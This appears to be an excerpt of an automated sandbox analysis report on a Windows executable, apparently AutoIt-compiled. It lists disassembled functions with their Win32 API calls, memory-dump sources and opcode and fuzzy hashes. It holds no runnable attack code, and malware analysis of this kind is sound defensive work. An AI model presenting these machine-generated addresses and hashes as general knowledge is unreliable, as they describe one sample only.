                                                                                      • Instruction Fuzzy Hash: 5B31B2352002819FCF20CF69C589AAA77E0EF55318F248059E9258B3A2D731EF45C760
                                                                                      Function 00CA4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CA4705
                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CA4713
                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CA471A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                      • String ID: msctls_updown32
                                                                                      • API String ID: 4014797782-2298589950
                                                                                      • Opcode ID: 6a0efa6eb90c4af59000b72789fab19e8329d80d0f338ac247f84b64903a538a
                                                                                      • Instruction ID: e1aea0e555df983eae506241229a44350f5d1eb0e008af96056286ec76757be4
                                                                                      • Opcode Fuzzy Hash: 6a0efa6eb90c4af59000b72789fab19e8329d80d0f338ac247f84b64903a538a
                                                                                      • Instruction Fuzzy Hash: 38214FB5600245AFDB14DF68DCC1EAB37ADEB8B3A8B040059FA109B261DB70ED51DB60
                                                                                      Function 00C795AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                      • API String ID: 176396367-2734436370
                                                                                      • Opcode ID: f047cb013a3c8485bb077b11ccf7486617a25cd245f2d00f595f51d9e69e0a31
                                                                                      • Instruction ID: c2ea28e91db22af7f4fcb748357ffb6975dda1308749e840ba750ca560612e14
                                                                                      • Opcode Fuzzy Hash: f047cb013a3c8485bb077b11ccf7486617a25cd245f2d00f595f51d9e69e0a31
                                                                                      • Instruction Fuzzy Hash: F0215B7210422166C371AB259C02FF773E8DF52314F10C13AF95D97181EB71AE86E2D5
                                                                                      Function 00CA37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CA3840
                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CA3850
                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CA3876
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MoveWindow
                                                                                      • String ID: Listbox
                                                                                      • API String ID: 3315199576-2633736733
                                                                                      • Opcode ID: c60cbb18111247e77ab5b07601fcda51528f1cf76cca9d2d47d17eea019c18ca
                                                                                      • Instruction ID: 17899ca5fa4353bf6f55f89fa64d045bd2458aa3816011b3a6176a9ddf4df162
                                                                                      • Opcode Fuzzy Hash: c60cbb18111247e77ab5b07601fcda51528f1cf76cca9d2d47d17eea019c18ca
                                                                                      • Instruction Fuzzy Hash: AC21C272600119BBEF218F54CC85FBB376EEF8A758F118125F9109B190CA75DD51C7A0
                                                                                      Function 00C849F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C84A08
                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C84A5C
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00CACC08), ref: 00C84AD0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                      • String ID: %lu
                                                                                      • API String ID: 2507767853-685833217
                                                                                      • Opcode ID: 29d89d47d3cd080e038d853636290b10e3d0eb43b76d76e72d5b9f7d8af1dcd5
                                                                                      • Instruction ID: a557e7babadff5fc9092584acdd8de989e9fba5c85535b5ff865d84a37e55b50
                                                                                      • Opcode Fuzzy Hash: 29d89d47d3cd080e038d853636290b10e3d0eb43b76d76e72d5b9f7d8af1dcd5
                                                                                      • Instruction Fuzzy Hash: 36315E75A00109AFDB14DF54C885EAE7BF8EF09308F1480A9E909DB252DB71EE46DB61
                                                                                      Function 00CA41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CA424F
                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CA4264
                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CA4271
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: msctls_trackbar32
                                                                                      • API String ID: 3850602802-1010561917
                                                                                      • Opcode ID: 5aa600152367356e2ede077d37cb59a075bda46441984a127acf3d50623a6aee
                                                                                      • Instruction ID: c3c91cd1fa7115da5232395447d35d21ac2e62a0257276e15e325f07cca1561f
                                                                                      • Opcode Fuzzy Hash: 5aa600152367356e2ede077d37cb59a075bda46441984a127acf3d50623a6aee
                                                                                      • Instruction Fuzzy Hash: E8110631240249BEEF205F69CC46FAB3BACEFC6B58F010224FA55E6090D6B1DC519B50
                                                                                      Function 00C72F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                        • Part of subcall function 00C72DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C72DC5
                                                                                        • Part of subcall function 00C72DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C72DD6
                                                                                        • Part of subcall function 00C72DA7: GetCurrentThreadId.KERNEL32 ref: 00C72DDD
                                                                                        • Part of subcall function 00C72DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C72DE4
                                                                                      • GetFocus.USER32 ref: 00C72F78
                                                                                        • Part of subcall function 00C72DEE: GetParent.USER32(00000000), ref: 00C72DF9
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C72FC3
                                                                                      • EnumChildWindows.USER32(?,00C7303B), ref: 00C72FEB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                      • String ID: %s%d
                                                                                      • API String ID: 1272988791-1110647743
                                                                                      • Opcode ID: 0902b07d11f373bd931e906b3052739578e2f31c172ed499bb9b0c5c44c16b84
                                                                                      • Instruction ID: 3fd97b0e481e9e01e0beb031794a31dcd94ebfad357d2da23b2bd66543bd663e
                                                                                      • Opcode Fuzzy Hash: 0902b07d11f373bd931e906b3052739578e2f31c172ed499bb9b0c5c44c16b84
                                                                                      • Instruction Fuzzy Hash: 2F11B471600205ABCF14BF708CC5FEE376AAF95314F048079F90D9B252DE309A45EB60
                                                                                      Function 00CA5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CA58C1
                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CA58EE
                                                                                      • DrawMenuBar.USER32(?), ref: 00CA58FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                      • String ID: 0
                                                                                      • API String ID: 3227129158-4108050209
                                                                                      • Opcode ID: c9e2dd35303e30ed4d8eea6d4aa7b83fa4a438673e710b89100838a3b0064001
                                                                                      • Instruction ID: 4f8fa94b027908ede11150ec3e534b7a28ecf11b31853a91f80b7293cfa3e2d8
                                                                                      • Opcode Fuzzy Hash: c9e2dd35303e30ed4d8eea6d4aa7b83fa4a438673e710b89100838a3b0064001
                                                                                      • Instruction Fuzzy Hash: E5015B31500219EEDB219F61EC44BAFBBB4FF46364F10C0A9F849DA151DB308A85EF21
                                                                                      Function 00C7007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ede8fb18de77df23ab8ae2999d189d11258ceb8fc21b094576a4f3cd382b740b
                                                                                      • Instruction ID: bf810367d669ce40de15895ab143b7f237fefd1aca62a5aecf7d7ccc6cb716c3
                                                                                      • Opcode Fuzzy Hash: ede8fb18de77df23ab8ae2999d189d11258ceb8fc21b094576a4f3cd382b740b
                                                                                      • Instruction Fuzzy Hash: A6C14D75A00206EFDB14CFA4C898BAEB7B5FF48714F208598E519EB261D731DE81CB90
                                                                                      Function 00C9342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 1998397398-0
                                                                                      • Opcode ID: 9d3b39a4d2367c6de04452ad24217a7a47eec79f8dd962e22c8342b6bb691be4
                                                                                      • Instruction ID: 0a880b63225cc5ee6db78206bd95c1f970449a4d0b578d38ecb71c05fdcef19f
                                                                                      • Opcode Fuzzy Hash: 9d3b39a4d2367c6de04452ad24217a7a47eec79f8dd962e22c8342b6bb691be4
                                                                                      • Instruction Fuzzy Hash: 40A15A752043009FCB10DF28C489A6AB7E5FF89714F048959F98A9B362DB30EE41DB92
                                                                                      Function 00C70436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CAFC08,?), ref: 00C705F0
                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CAFC08,?), ref: 00C70608
                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00CACC40,000000FF,?,00000000,00000800,00000000,?,00CAFC08,?), ref: 00C7062D
                                                                                      • _memcmp.LIBVCRUNTIME ref: 00C7064E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 314563124-0
                                                                                      • Opcode ID: 1dc8904b5addd2cbaa367bfdf1392314ab5e273fa1f4e327c85b6c2b746070d5
                                                                                      • Instruction ID: d2c11210e41d68fbecff97b9810cac46a5c31fa2006d8340d8b963adebdbb28d
                                                                                      • Opcode Fuzzy Hash: 1dc8904b5addd2cbaa367bfdf1392314ab5e273fa1f4e327c85b6c2b746070d5
                                                                                      • Instruction Fuzzy Hash: D3810971A00109EFCB04DF94C998EEEB7B9FF89315F208558F516AB250DB71AE46CB60
                                                                                      Function 00C51391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free
                                                                                      • String ID:
                                                                                      • API String ID: 269201875-0
                                                                                      • Opcode ID: 87c4556e3a89522d3ef0371576b45bc6402f4b76946a4a3a093a088fafe06fcd
                                                                                      • Instruction ID: 5aba925abd29f8beb4077d3c7ccf33ebe6c27fb98ab8e71e92c3c91ed112a8aa
                                                                                      • Opcode Fuzzy Hash: 87c4556e3a89522d3ef0371576b45bc6402f4b76946a4a3a093a088fafe06fcd
                                                                                      • Instruction Fuzzy Hash: BC413C39A00110ABDB216BBA9C4DBBF3AA4FF41371F1C0625FC29D6192E77489C56276
                                                                                      Function 00CA6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(0125DA38,?), ref: 00CA62E2
                                                                                      • ScreenToClient.USER32(?,?), ref: 00CA6315
                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00CA6382
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                      • String ID:
                                                                                      • API String ID: 3880355969-0
                                                                                      • Opcode ID: a97181196f1b3e8a26497a8d511912e8aadd9b1969062061d88956b25cfcd7a1
                                                                                      • Instruction ID: 7c5481b3c9d010ec1862a5c2c3e03ba74026578e7a048f2aab3d6e9a6eac37b5
                                                                                      • Opcode Fuzzy Hash: a97181196f1b3e8a26497a8d511912e8aadd9b1969062061d88956b25cfcd7a1
                                                                                      • Instruction Fuzzy Hash: 8951417490124AEFCF10DF54D880AAE7BB5FF56368F148259F9259B2A0D730EE51CB50
                                                                                      Function 00C91AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00C91AFD
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C91B0B
                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C91B8A
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C91B94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$socket
                                                                                      • String ID:
                                                                                      • API String ID: 1881357543-0
                                                                                      • Opcode ID: c054e288ad98910b18d739ad44aff3cf7201089b1f26e8c4f1f60a03a8841f86
                                                                                      • Instruction ID: 200a00f94d3c221fcf719407d7fbe7620feca400b7ee2ad86a27c9b7f1505161
                                                                                      • Opcode Fuzzy Hash: c054e288ad98910b18d739ad44aff3cf7201089b1f26e8c4f1f60a03a8841f86
                                                                                      • Instruction Fuzzy Hash: D641F5746002016FDB20AF24C88AF6977E1AB45708F54C448F9258F7D3D772ED82DB90
                                                                                      Function 00C4B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c174c1ca4a87bc5859a5b10163de4c08073e2412e0b7d22c9d0a195126af4e80
                                                                                      • Instruction ID: 5c3bed0bbec07413a6630b1b4caa5487d81512a8c1155c84c4619ed77afa16c5
                                                                                      • Opcode Fuzzy Hash: c174c1ca4a87bc5859a5b10163de4c08073e2412e0b7d22c9d0a195126af4e80
                                                                                      • Instruction Fuzzy Hash: 32412475A00304AFD7259F38CC46BAABBE9FB88720F10852EF515DB282D371DE419790
                                                                                      Function 00C856D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C85783
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00C857A9
                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C857CE
                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C857FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 3321077145-0
                                                                                      • Opcode ID: b745f6ecd1ce92455132ba17ead7a92a9a90db42cdbb7110dc79fb12ff503a22
                                                                                      • Instruction ID: b62ff9f39496fa147d669e71d7d45dc89315c49291536f1921365bbb27e3fcce
                                                                                      • Opcode Fuzzy Hash: b745f6ecd1ce92455132ba17ead7a92a9a90db42cdbb7110dc79fb12ff503a22
                                                                                      • Instruction Fuzzy Hash: 48414F35600610DFCB11EF15C484A5DBBF2EF4A324B18C488E85A9B362CB70FD41EB91
                                                                                      Function 00C4D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00C36D71,00000000,00000000,00C382D9,?,00C382D9,?,00000001,00C36D71,8BE85006,00000001,00C382D9,00C382D9), ref: 00C4D910
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C4D999
                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C4D9AB
                                                                                      • __freea.LIBCMT ref: 00C4D9B4
